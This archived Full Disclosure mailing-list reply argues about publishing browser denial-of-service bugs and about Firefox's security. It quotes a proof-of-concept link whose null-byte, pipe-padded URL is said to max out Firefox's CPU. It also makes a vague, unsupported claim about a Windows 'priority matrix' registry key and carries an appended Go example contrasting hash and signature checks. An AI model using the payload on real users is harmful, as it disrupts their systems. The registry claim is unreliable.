Full Disclosure mailing list archives

Re: To anybody who's offended by my disclosure policy-GET THIS GUYS


From: James Tucker <jftucker () gmail com>
Date: Fri, 17 Dec 2004 02:05:56 +0000

I don't have a lot to say on this topic as a whole which I have not
said before, so some of this is just repetition; maybe it'll be heard
this time. DoSing browsers will almost always be possible, as with any
other application, so long as you can load it up to process enough
information.

If the developers put range checks on every input, the system would
perform very slowly and would not scale up to future hardware
capabilities. For mission-critical applications this is fully
necessary, but to be quite honest there isn't a perfect solution
(there's no such thing as functional equivalence when it comes to
software design).

The 'exploit' in question may have some other ramifications than just
processor usage, and if it does then fair enough; but frankly making
something which simply occupies processor time is not hard, and would
be just as easy to do with JavaScript as with anything else. The most
difficult thing about this is to make the task the correct time that
it will abuse the session manager's priority matrix. For more detail on
that see HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager
along with any related technical docs.




On Thu, 21 Oct 2004 11:26:14 +0200, Rafel Ivgi, The-Insider
<rivgi () finjan com> wrote:
> SkyLined is a great dude. Scerious guy!

scerious eh?

> He is only worthy of RESPECT and no blame.
> There is no signed law against releasing such information, and it's funny
> someone is anyhow talking about this in the
> FULL-DISCLOSURE list, whose entire concept is to disclose full details
> about vulnerabilities.

what vulnerability?


If you're talking about excess use of processor time then you are
currently performing quite a nice PoC in making me feel that this mail
is necessary!

 
> By the way, for all of the FireFox fans... FireFox has many open vulnerabilities
> which its vendor refuses to fix, even after notifying them
> and even after 4 months :-)... Moreover, they are just like MS, claiming
> certain bugs are not bugs, talking "in the air" without checking
> and under-blowing risk values. They don't even sign their exes (which is a
> super minimal protection against a man-in-the-middle replacing downloads), so
> Microsoft Windows can't say it's a valid file from a valid vendor and not a
> virus.

You should know, though, as well as the rest of us, that signing
technologies are not perfect, and the man in the middle can stand to
corrupt other data transfers too, making signing somewhat pointless in
this scenario.



> For Example:
> <a
> href='http://theinsider.deep-ice.com/ctfmon.exe%00/hehe.exe.||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||
> '>test it</a>

> This has no effect on I.E......
> Will cause LooserFox, ahh sorry, FireFox to ***BURN ALL YOUR CPU!!! 100%
> FOREVER...***

Maybe you would find yourself receiving a little more respect if you
showed some to the vendor and didn't call them losers? Just an idea;
surely you are good at social engineering too, but you don't seem to
show it.

> What I am saying is, it is now who codes the software, it is how you do.

So time codes software?
Sorry, I know what you are trying to say. Well, this is the core of my
point: if SkyLined is such a great bloke, why doesn't he get the source
from the CVS and actually send better code back? This is supposed to
be what open source is all about. There is some hypocrisy in here
somewhere which I hope you can find for yourself, because I don't want
to start that much of a battle; just please start being reasonable.


> (If I was not in a job working frame, I would be publishing things that will
> cause you all to say it's shit)

What makes you think that these kinds of 'exploits' cannot be built
for any other browser? Why do you consider Firefox worse than other
browsers, in REAL justified terms? I don't want to read RAW HTML all
the time just because there isn't a good piece of software out there
to perform this job; I make an informed decision as to which one is
going to serve my purpose best and I use that. I wish that all
software could be perfect, but I have my eyes open to the reality that
this will not always be the case.

> FireFox team claimed it's an old bug... bla bla bla... and has no problem and no
> security risk... bla bla bla... and didn't fix it after 4 months...

Once again, if it's so easy to fix, why hasn't one of you geniuses done it yet?

> Just like MS, when they are not even commercial, then what are they? On the
> way to making money... to be the second-sized market share browser.

So the top two browsers in the world both have major security
implications for their users; maybe this would suggest something to you
about how easy it is to develop such a piece of software so that it
works with most pages and will satisfy most customers. Do you really
think that all these coders are so bad? Are you trying to suggest that
when you code you never have to debug and it always comes out
mathematically optimal? If so, then why don't you go and pay someone to
fix it with the vast capital that you should be earning for your
skills? After all, you are the one who claims you're only doing it to
better the world for mankind.

> GO SKYLINED!

If you really want people to consider you to be useful then try to
actually fix what you break; otherwise you have to realise that your
actions are only destructive. In the case of Internet Explorer you
don't get that option, but your attitude toward Firefox is a little
strange at best.



> Rafel Ivgi, The-Insider
> Security Consultant
> Malicious Code Research Center (MCRC)
> Finjan Software LTD
> E-mail: rivgi () Finjan com
> ---------------------------------
> Prevention is the best cure!

I suggest you listen to your own footer!
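[Editor's added example, not part of either poster's mail.] The exchange above turns on what a man in the middle can and cannot rewrite when a download is signed versus merely published with a hash. The program below is an illustration written for this archive page, not Mozilla's or Finjan's code: it models a vendor publishing an installer with a SHA-256 beside it and a detached signature, an attacker on the network path who swaps the file and recomputes the hash, and a client that checks the download both ways. Ed25519 stands in for the Authenticode/X.509 machinery Windows actually uses; the installer bytes, the vendor and attacker keys, and the "pinned" vendor public key are all constructed inside the program.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"fmt"
)

// Release is what a download page hands out: the installer bytes, a SHA-256 of
// them printed beside the link, and a detached signature over the bytes. Everything
// here is constructed for the example; the "installer" is a placeholder byte string,
// not a real PE file.
type Release struct {
	Binary []byte
	SHA256 [32]byte
	Sig    []byte
}

// publish is the vendor side: hash the genuine installer and sign it with the vendor key.
func publish(installer []byte, vendorPriv ed25519.PrivateKey) Release {
	return Release{
		Binary: installer,
		SHA256: sha256.Sum256(installer),
		Sig:    ed25519.Sign(vendorPriv, installer),
	}
}

// tamper is the man in the middle from the thread. Controlling the network path, he
// can rewrite every byte that crosses it: the installer, the hash beside it and the
// signature field. What he does not have is the vendor's private key, so the only
// signature he can attach is one under a key of his own.
func tamper(trojan []byte, attackerPriv ed25519.PrivateKey) Release {
	return Release{
		Binary: trojan,
		SHA256: sha256.Sum256(trojan),             // recomputed so the swapped file "checks out"
		Sig:    ed25519.Sign(attackerPriv, trojan), // signed, but not by the vendor
	}
}

// verifyByHash is the check a user can do when nothing is signed: compare the file
// with the hash on the download page. Hash and file travelled over the same channel,
// so a MITM who rewrote both passes this check.
func verifyByHash(r Release) bool {
	return sha256.Sum256(r.Binary) == r.SHA256
}

// verifyBySignature is the check a signed installer gets. The vendor public key is
// not fetched with the download; it is already on the client (here passed in as a
// pinned key, a stand-in for the Windows trusted publisher store), so the MITM's
// rewrite of the channel never touches it.
func verifyBySignature(r Release, pinnedVendorPub ed25519.PublicKey) bool {
	return ed25519.Verify(pinnedVendorPub, r.Binary, r.Sig)
}

// Outcome records what each check says about the genuine and the swapped download.
type Outcome struct {
	GenuineHashOK, GenuineSigOK, TamperedHashOK, TamperedSigOK bool
}

// run plays the whole exchange: vendor publishes, attacker swaps, client checks both ways.
func run() (Outcome, error) {
	vendorPub, vendorPriv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return Outcome{}, err
	}
	_, attackerPriv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return Outcome{}, err
	}
	genuine := publish([]byte("MZ... constructed stand-in for the real installer"), vendorPriv)
	swapped := tamper([]byte("MZ... constructed stand-in for a trojaned installer"), attackerPriv)
	return Outcome{
		GenuineHashOK:  verifyByHash(genuine),
		GenuineSigOK:   verifyBySignature(genuine, vendorPub),
		TamperedHashOK: verifyByHash(swapped),
		TamperedSigOK:  verifyBySignature(swapped, vendorPub),
	}, nil
}

func main() {
	o, err := run()
	if err != nil {
		panic(err)
	}
	fmt.Printf("genuine download: hash check=%v signature check=%v\n", o.GenuineHashOK, o.GenuineSigOK)
	fmt.Printf("swapped download: hash check=%v signature check=%v\n", o.TamperedHashOK, o.TamperedSigOK)
}
```

The swapped download passes the hash-only check and fails the signature check, which is the whole difference between the two positions in the thread: the attacker can corrupt anything that travels over the path he controls, and the signature only helps because the key it is checked against did not travel over that path. The caveat a practitioner should keep in mind is the other half of the same point: if the client's trust anchor (the pinned key here, the CA chain in the Windows store for real Authenticode) was itself obtained over an attacker-controlled channel, or the user clicks through an "unknown publisher" warning, the signature buys nothing.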
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

